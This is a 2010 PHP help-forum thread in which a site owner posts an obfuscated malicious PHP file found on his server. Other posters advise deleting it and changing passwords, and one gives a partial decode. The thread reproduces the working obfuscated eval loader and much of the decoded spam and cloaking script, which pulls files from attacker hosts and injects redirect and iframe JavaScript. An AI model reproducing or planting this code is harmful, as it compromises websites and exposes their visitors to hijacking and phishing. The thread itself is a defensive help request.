What is this code?

Discussion in 'PHP' started by Axcell, Apr 23, 2010.

0
  1. #1
    I found a strange file in my server with this code.
    <?php
$f816fa130fc23298137b344d4bd1c63d="\x62";$ce728c29f19b1f8ab33d4315a2d054ac="\x65";$m4863a3c77f25f5dccf4b60772fc8896="\x66";$pdf75c46b141cae275cfefbd894eab13="\x67";$ff07b835b7043a390217f21f5c1c5b3d="\x6d";$y801c76f2f7fbbf4de3759223c249e4f="\x6f";$l08178b3ca9c5b949dd8e839f1093cb3="\x6f";$l4591ab2c55a4629f9e01d7b21ca5214="\x6f";$m48aba6121b1aab8a41d75a9573c1877="\x6f";$ra871a69c309b784e1eb98ba0da6942b="\x73";$b60c93498e2b9505baeb837b71719bd4="\x73";$d5d963eb3055ab8267aa60c02061a697="\x73";$g5470888a4ebd419b4041630e6f94344="\x73";$f816fa130fc23298137b344d4bd1c63d.="\141";$ce728c29f19b1f8ab33d4315a2d054ac.="\162";$m4863a3c77f25f5dccf4b60772fc8896.="\151";$pdf75c46b141cae275cfefbd894eab13.="\172";$ff07b835b7043a390217f21f5c1c5b3d.="\144";$y801c76f2f7fbbf4de3759223c249e4f.="\142";$l08178b3ca9c5b949dd8e839f1093cb3.="\142";$l4591ab2c55a4629f9e01d7b21ca5214.="\142";$m48aba6121b1aab8a41d75a9573c1877.="\142";$ra871a69c309b784e1eb98ba0da6942b.="\164";$b60c93498e2b9505baeb837b71719bd4.="\164";$d5d963eb3055ab8267aa60c02061a697.="\164";$g5470888a4ebd419b4041630e6f94344.="\164";$f816fa130fc23298137b344d4bd1c63d.="\x73";$ce728c29f19b1f8ab33d4315a2d054ac.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x6c";$pdf75c46b141cae275cfefbd894eab13.="\x69";$ff07b835b7043a390217f21f5c1c5b3d.="\x35";$y801c76f2f7fbbf4de3759223c249e4f.="\x5f";$l08178b3ca9c5b949dd8e839f1093cb3.="\x5f";$l4591ab2c55a4629f9e01d7b21ca5214.="\x5f";$m48aba6121b1aab8a41d75a9573c1877.="\x5f";$ra871a69c309b784e1eb98ba0da6942b.="\x72";$b60c93498e2b9505baeb837b71719bd4.="\x72";$d5d963eb3055ab8267aa60c02061a697.="\x72";$g5470888a4ebd419b4041630e6f94344.="\x72";$f816fa130fc23298137b344d4bd1c63d.="\145";$ce728c29f19b1f8ab33d4315a2d054ac.="\147";$m4863a3c77f25f5dccf4b60772fc8896.="\145";$pdf75c46b141cae275cfefbd894eab13.="\156";$y801c76f2f7fbbf4de3759223c249e4f.="\145";$l08178b3ca9c5b949dd8e839f1093cb3.="\145";$l4591ab2c55a4629f9e01d7b21ca5214.="\147";$m48aba6121b1aab8a41d75a9573c1877.="\163";$ra871a69c309b784e1eb98ba0da6942b.="\137";$b60c93498e2b9505baeb837b71719bd4.="\137";$d5d963eb3055ab8267aa60c02061a697.="\160";$g5470888a4ebd419b4041630e6f94344.="\164";$f816fa130fc23298137b344d4bd1c63d.="\x36";$ce728c29f19b1f8ab33d4315a2d054ac.="\x5f";$m4863a3c77f25f5dccf4b60772fc8896.="\x5f";$pdf75c46b141cae275cfefbd894eab13.="\x66";$y801c76f2f7fbbf4de3759223c249e4f.="\x6e";$l08178b3ca9c5b949dd8e839f1093cb3.="\x6e";$l4591ab2c55a4629f9e01d7b21ca5214.="\x65";$m48aba6121b1aab8a41d75a9573c1877.="\x74";$ra871a69c309b784e1eb98ba0da6942b.="\x72";$b60c93498e2b9505baeb837b71719bd4.="\x72";$d5d963eb3055ab8267aa60c02061a697.="\x6f";$g5470888a4ebd419b4041630e6f94344.="\x6f";$f816fa130fc23298137b344d4bd1c63d.="\64";$ce728c29f19b1f8ab33d4315a2d054ac.="\162";$m4863a3c77f25f5dccf4b60772fc8896.="\147";$pdf75c46b141cae275cfefbd894eab13.="\154";$y801c76f2f7fbbf4de3759223c249e4f.="\144";$l08178b3ca9c5b949dd8e839f1093cb3.="\144";$l4591ab2c55a4629f9e01d7b21ca5214.="\164";$m48aba6121b1aab8a41d75a9573c1877.="\141";$ra871a69c309b784e1eb98ba0da6942b.="\145";$b60c93498e2b9505baeb837b71719bd4.="\157";$d5d963eb3055ab8267aa60c02061a697.="\163";$g5470888a4ebd419b4041630e6f94344.="\153";$f816fa130fc23298137b344d4bd1c63d.="\x5f";$ce728c29f19b1f8ab33d4315a2d054ac.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x65";$pdf75c46b141cae275cfefbd894eab13.="\x61";$y801c76f2f7fbbf4de3759223c249e4f.="\x5f";$l08178b3ca9c5b949dd8e839f1093cb3.="\x5f";$l4591ab2c55a4629f9e01d7b21ca5214.="\x5f";$m48aba6121b1aab8a41d75a9573c1877.="\x72";$ra871a69c309b784e1eb98ba0da6942b.="\x70";$b60c93498e2b9505baeb837b71719bd4.="\x74";$f816fa130fc23298137b344d4bd1c63d.="\144";$ce728c29f19b1f8ab33d4315a2d054ac.="\160";$m4863a3c77f25f5dccf4b60772fc8896.="\164";$pdf75c46b141cae275cfefbd894eab13.="\164";$y801c76f2f7fbbf4de3759223c249e4f.="\143";$l08178b3ca9c5b949dd8e839f1093cb3.="\146";$l4591ab2c55a4629f9e01d7b21ca5214.="\143";$m48aba6121b1aab8a41d75a9573c1877.="\164";$ra871a69c309b784e1eb98ba0da6942b.="\154";$b60c93498e2b9505baeb837b71719bd4.="\61";$f816fa130fc23298137b344d4bd1c63d.="\x65";$ce728c29f19b1f8ab33d4315a2d054ac.="\x6c";$m4863a3c77f25f5dccf4b60772fc8896.="\x5f";$pdf75c46b141cae275cfefbd894eab13.="\x65";$y801c76f2f7fbbf4de3759223c249e4f.="\x6c";$l08178b3ca9c5b949dd8e839f1093cb3.="\x6c";$l4591ab2c55a4629f9e01d7b21ca5214.="\x6f";$ra871a69c309b784e1eb98ba0da6942b.="\x61";$b60c93498e2b9505baeb837b71719bd4.="\x33";$f816fa130fc23298137b344d4bd1c63d.="\143";$ce728c29f19b1f8ab33d4315a2d054ac.="\141";$m4863a3c77f25f5dccf4b60772fc8896.="\143";$y801c76f2f7fbbf4de3759223c249e4f.="\145";$l08178b3ca9c5b949dd8e839f1093cb3.="\165";$l4591ab2c55a4629f9e01d7b21ca5214.="\156";$ra871a69c309b784e1eb98ba0da6942b.="\143";$f816fa130fc23298137b344d4bd1c63d.="\x6f";$ce728c29f19b1f8ab33d4315a2d054ac.="\x63";$m4863a3c77f25f5dccf4b60772fc8896.="\x6f";$y801c76f2f7fbbf4de3759223c249e4f.="\x61";$l08178b3ca9c5b949dd8e839f1093cb3.="\x73";$l4591ab2c55a4629f9e01d7b21ca5214.="\x74";$ra871a69c309b784e1eb98ba0da6942b.="\x65";$f816fa130fc23298137b344d4bd1c63d.="\144";$ce728c29f19b1f8ab33d4315a2d054ac.="\145";$m4863a3c77f25f5dccf4b60772fc8896.="\156";$y801c76f2f7fbbf4de3759223c249e4f.="\156";$l08178b3ca9c5b949dd8e839f1093cb3.="\150";$l4591ab2c55a4629f9e01d7b21ca5214.="\145";$f816fa130fc23298137b344d4bd1c63d.="\x65";$m4863a3c77f25f5dccf4b60772fc8896.="\x74";$l4591ab2c55a4629f9e01d7b21ca5214.="\x6e";$m4863a3c77f25f5dccf4b60772fc8896.="\145";$l4591ab2c55a4629f9e01d7b21ca5214.="\164";$m4863a3c77f25f5dccf4b60772fc8896.="\x6e";$l4591ab2c55a4629f9e01d7b21ca5214.="\x73";$m4863a3c77f25f5dccf4b60772fc8896.="\164";$m4863a3c77f25f5dccf4b60772fc8896.="\x73";$m48aba6121b1aab8a41d75a9573c1877();if($ff07b835b7043a390217f21f5c1c5b3d($ce728c29f19b1f8ab33d4315a2d054ac("\x5c\50\x22\133\x30\55\x39\101\x2d\132\x61\55\x7a\134\x2b\57\x3d\135\x2a\42\x5c\51","\x28\42\x22\51",$ra871a69c309b784e1eb98ba0da6942b("\r\n","",$m4863a3c77f25f5dccf4b60772fc8896($g5470888a4ebd419b4041630e6f94344(__FILE__,"\x28")))))=="\x63\60\x32\61\x30\64\x65\64\x36\145\x39\65\x33\145\x33\62\x33\63\x61\143\x37\64\x61\63\x64\61\x34\143\x32\145\x35\144"){@eval($pdf75c46b141cae275cfefbd894eab13($f816fa130fc23298137b344d4bd1c63d($b60c93498e2b9505baeb837b71719bd4("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"))));}$d5d963eb3055ab8267aa60c02061a697($l4591ab2c55a4629f9e01d7b21ca5214(),"\x64\141\x66\65\x34\141\x64\62\x31\61\x38\71\x34\71\x34\64\x61\141\x36\70\x64\60\x63\143\x35\60\x31\142\x65\67\x31\67")?$y801c76f2f7fbbf4de3759223c249e4f():$l08178b3ca9c5b949dd8e839f1093cb3();
?>
    PHP:
    Can someone decode it?
     
    Axcell, Apr 23, 2010 IP
  2. JAY6390

    JAY6390 Peon

    Messages:
    918
    Likes Received:
    31
    Best Answers:
    0
    Trophy Points:
    0
    #2
    To be honest if you find a strange code in your server you should just delete it. This could be malicious code

    You shouldn't use third party code without knowing what it is and if you didn't put it there, chances are it's not good
     
    JAY6390, Apr 23, 2010 IP
  3. raid

    raid Peon

    Messages:
    63
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Somebody may have hacked your site and uploaded that. I would delete it and find out where (or if it was a vulnerability). Good luck.
     
    raid, Apr 23, 2010 IP
  4. daddyG

    daddyG Peon

    Messages:
    23
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    0
    #4
    and don't forget to change your passwords after you delete this file
     
    daddyG, Apr 23, 2010 IP
  5. Axcell

    Axcell Active Member

    Messages:
    128
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    73
    #5
    I removed the file but curious what is it
     
    Axcell, Apr 24, 2010 IP
  6. Taffy1957

    Taffy1957 Peon

    Messages:
    14
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #6
    Hi guys, have just registered and stumbled straight upon this thread !

    Yes it is malicious code & it is used to redirect a site user to a different but mirrored site for harvesting of personal info !
    I had the exact same thing 3 times last year, until I eventually switched web host. If you use Google adsense you will eventually receive a warning from them & if not dealt with, they will de-index your site !
    One other thing I did, but not sure how effective it was, was to use my htaccess file in the root of my site, to restrict access to the admin area & only allow access to my IP address.
    But either way I would delete that code ASAP & then request a username change from your host & also change your password.
    Keep a close eye on things for a week or two & pray they move on !
    You could also contact your hosting company and tell them you have experienced a code injection (that is what my host called it) & request they tighten up their security !

    Hope that helps

    PS. check your web mail for bogus accounts also, I found 5 when I had this problem !!!
     
    Last edited: Apr 24, 2010
    Taffy1957, Apr 24, 2010 IP
  7. Brad33

    Brad33 Peon

    Messages:
    69
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #7
    I just did a rough decode of this script manually.

    The main block of code:

    ob_start();
if(md5(ereg_replace('\("[0-9A-Za-z\+/=]*"\)','("")',str_replace("\r\n","",file_get_contents(strtok(__FILE__,"(")))))=="c02104e46e953e3233ac74a3d14c2e5d"){
@eval(gzinflate(base64_decode(str_rot13("[encoded script]"))));}
strpos(ob_get_contents(),"daf54ad211894944aa68d0cc501be717")?ob_end_clean():ob_end_flush();
    PHP:
    Now, where I have it saying [encoded script] is another script that was encoded and I decoded manually (Its a rough decode so it probably wont execute)

    /*daf54ad211894944aa68d0cc501be717*/?>$timelimit) { $content = crawl_page("http://www.google.com/trends/hottrends?sa=X"); $fp = fopen($lndfile,"w+"); preg_match_all("#hottrends\?q=([^&]+)&#U", $content, $content_preg); foreach($content_preg[1] as $key) { $key = str_replace("+","-",$key); if (strlen($key) < 20) fwrite ($fp,"<a href=./".$key.".html>".str_replace("-"," ",$key)."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function getTrends() { $timelimit = 60*60*3; $lndfile="./.cache/trends.txt"; if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit) { $address = "http://www.google.com/trends/hottrends?sa=X&date=".date("Y-m-d",time() - 60*60*24*3); $content = crawl_page($address); $address = "http://www.google.com/trends/hottrends?sa=X&date=".date("Y-m-d",time() - 60*60*24*2); $content .= crawl_page($address); $fp = fopen($lndfile,"w+"); preg_match_all("#hottrends\?q=([^&]+)&#U", $content, $content_preg); foreach($content_preg[1] as $key) { if (strlen($key) < 20) fwrite ($fp,"<a href=./".str_replace("+","-",$key).".html>".str_replace("+"," ",$key)."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function getAdvKeys($key) { $timelimit = 60*60*3; $lndfile="./.cache/".$key."-adv.txt"; if(!file_exists($lndfile)||time()-filemtime($lndfile)>$timelimit) { $content = crawl_page("http://clients1.google.ru/complete/search?hl=en&q=".str_replace("-","+",$key)); $fp = fopen($lndfile,"w+"); preg_match_all("|\[([^]+),|si",$content, $content_preg, PREG_PATTERN_ORDER); foreach($content_preg[1] as $key) { fwrite ($fp,"<a href=./".str_replace(" ","-",$key).".html>".$key."</a><br>"); } fclose($fp); } return file_get_contents($lndfile); } function loadTemplate($template = "default.dot") { if (!$template) $template = "default.dot"; if (!file_exists($template) || !is_readable($template)) { die (print("LOAD_TEMPLATE")); return null; } $fh = fopen($template, "r"); $template = fread($fh, filesize($template)); return $template; } function getContent($key) { $lndfile="./.cache/".$key.".html"; if(!file_exists($lndfile)) { $key = str_replace("-","+",$key); $fp = fopen($lndfile,"w+"); $url="http://www.google.ru/search?client=firefox&num=100&hl=en&q=".$key."&lr=lang_en"; $result=crawl_page($url); preg_match_all("#<div class=s>(.*)<br>#U", $result, $result_preg); $s=array(); for ($i=0; $i<10; $j++) { $align = array("left", "right"); $links[$j] = "<img src="".$matches[1][$j]."" alt="".$key."" title="".$key."" align="".$align[rand(0,1)]."" />"; } for($i=0;$i<50;$i++){ if ($i%5==0) $c.=$links[$i/5]; $c.="<P>".$s[$i]."</P>"; } fwrite ($fp,$c); fclose($fp); } return file_get_contents($lndfile); } function init() { if(!file_exists(".htaccess")) { $file = crawl_page("http://pepelac.byethost4.com/htaccess"); $fp = fopen(".htaccess","w+"); fwrite ($fp,$file); fclose($fp); } if(!file_exists("style.css")) { $file = crawl_page("http://pepelac.byethost4.com/style"); $fp = fopen("style.css","w+"); fwrite ($fp,$file); fclose($fp); } if(!file_exists("default.dot")) { $file = crawl_page("http://pepelac.byethost4.com/default"); $fp = fopen("default.dot","w+"); fwrite ($fp,$file); fclose($fp); } return true; } function is_search_bots() { $ua = $_SERVER["HTTP_USER_AGENT"]; $htr = $_SERVER["HTTP_REFERER"]; $flag_g = stristr($ua, "googlebot"); $flag_y = stristr($ua, "slurp"); $flag_m = stristr($ua, "msnbot"); $isbot = false; if ($flag_g || $flag_y || $flag_m) { $isbot = true; $inf = date("Y-m-d H:i:s") . "|" . $ua . "|" . $_SERVER["REMOTE_ADDR"] . "|" . $_SERVER["REQUEST_URI"] . "
"; $fp = fopen("stats.txt", "a"); fwrite($fp, $inf); fclose($fp); } if (!$isbot) { $flag_g = stristr($htr, "google"); $flag_s = stristr($htr, "search"); if (!$flag_g && !$flag_s) { $isbot = true; } } $zones = array(".AC", ".AD", ".AE", ".AERO", ".AF", ".AG", ".AI", ".AL", ".AM", ".AN", ".AO", ".AQ", ".AR", ".ARPA", ".AS", ".ASIA", ".AT", ".AU", ".AW", ".AX", ".AZ", ".BA", ".BB", ".BD", ".BE", ".BF", ".BG", ".BH", ".BI", ".BIZ", ".BJ", ".BM", ".BN", ".BO", ".BR", ".BS", ".BT", ".BV", ".BW", ".BY", ".BZ", ".CA", ".CAT", ".CC", ".CD", ".CF", ".CG", ".CH", ".CI", ".CK", ".CL", ".CM", ".CN", ".CO", ".COM", ".COOP", ".CR", ".CU", ".CV", ".CX", ".CY", ".CZ", ".DE", ".DJ", ".DK", ".DM", ".DO", ".DZ", ".EC", ".EDU", ".EE", ".EG", ".ER", ".ES", ".ET", ".EU", ".FI", ".FJ", ".FK", ".FM", ".FO", ".FR", ".GA", ".GB", ".GD", ".GE", ".GF", ".GG", ".GH", ".GI", ".GL", ".GM", ".GN", ".GOV", ".GP", ".GQ", ".GR", ".GS", ".GT", ".GU", ".GW", ".GY", ".HK", ".HM", ".HN", ".HR", ".HT", ".HU", ".ID", ".IE", ".IL", ".IM", ".IN", ".INFO", ".INT", ".IO", ".IQ", ".IR", ".IS", ".IT", ".JE", ".JM", ".JO", ".JOBS", ".JP", ".KE", ".KG", ".KH", ".KI", ".KM", ".KN", ".KP", ".KR", ".KW", ".KY", ".KZ", ".LA", ".LB", ".LC", ".LI", ".LK", ".LR", ".LS", ".LT", ".LU", ".LV", ".LY", ".MA", ".MC", ".MD", ".ME", ".MG", ".MH", ".MIL", ".MK", ".ML", ".MM", ".MN", ".MO", ".MOBI", ".MP", ".MQ", ".MR", ".MS", ".MT", ".MU", ".MUSEUM", ".MV", ".MW", ".MX", ".MY", ".MZ", ".NA", ".NAME", ".NC", ".NE", ".NET", ".NF", ".NG", ".NI", ".NL", ".NO", ".NP", ".NR", ".NU", ".NZ", ".OM", ".ORG", ".PA", ".PE", ".PF", ".PG", ".PH", ".PK", ".PL", ".PM", ".PN", ".PR", ".PRO", ".PS", ".PT", ".PW", ".PY", ".QA", ".RE", ".RO", ".RS", ".RU", ".RW", ".SA", ".SB", ".SC", ".SD", ".SE", ".SG", ".SH", ".SI", ".SJ", ".SK", ".SL", ".SM", ".SN", ".SO", ".SR", ".ST", ".SU", ".SV", ".SY", ".SZ", ".TC", ".TD", ".TEL", ".TF", ".TG", ".TH", ".TJ", ".TK", ".TL", ".TM", ".TN", ".TO", ".TP", ".TR", ".TT", ".TV", ".TW", ".TZ", ".UA", ".UG", ".UK", ".US", ".UY", ".UZ", ".VA", ".VC", ".VE", ".VG", ".VI", ".VN", ".VU", ".WF", ".WS", ".YE", ".YT", ".YU", ".ZA", ".ZM", ".ZW"); if (!$isbot) { $tmp1 = explode("q=", $htr); $tmp2 = explode("&",$tmp1[1]); $kw = $tmp2[0]; for ($i=0; $i$timelimit){ $link = crawl_page("http://originalmix.co.cc/1.php"); $content = "<script type="text/javascript">new Image().src = "//counter.yadro.ru/hit;pepelac?r" + escape(document.referrer) + ((typeof(screen)=="undefined")?"" : ";s"+screen.width+"*"+screen.height+"*" + (screen.colorDepth?screen.colorDepth:screen.pixelDepth)) + ";u"+escape(document.URL) +  ";" +Math.random();</script>".chr(10); $content .= "<script>".chr(10)."document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px></div>');".chr(10); $content .= "if (navigator.appVersion.indexOf(Mac)!=-1) window.location=;".chr(10); $content .= "else if (navigator.userAgent.indexOf(Firefox)!=-1) document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px><iframe src= width=100% height=100%></iframe></div>');".chr(10); $content .= "else if (navigator.userAgent.indexOf(Chrome)!=-1) document.write('<div style=position: absolute; top: 0; left: 0; width: 100%;  height: 100%;  background-color: #FFFFFF; padding: 0px><iframe src= width=100% height=100%></iframe></div>');".chr(10); $content .= "else 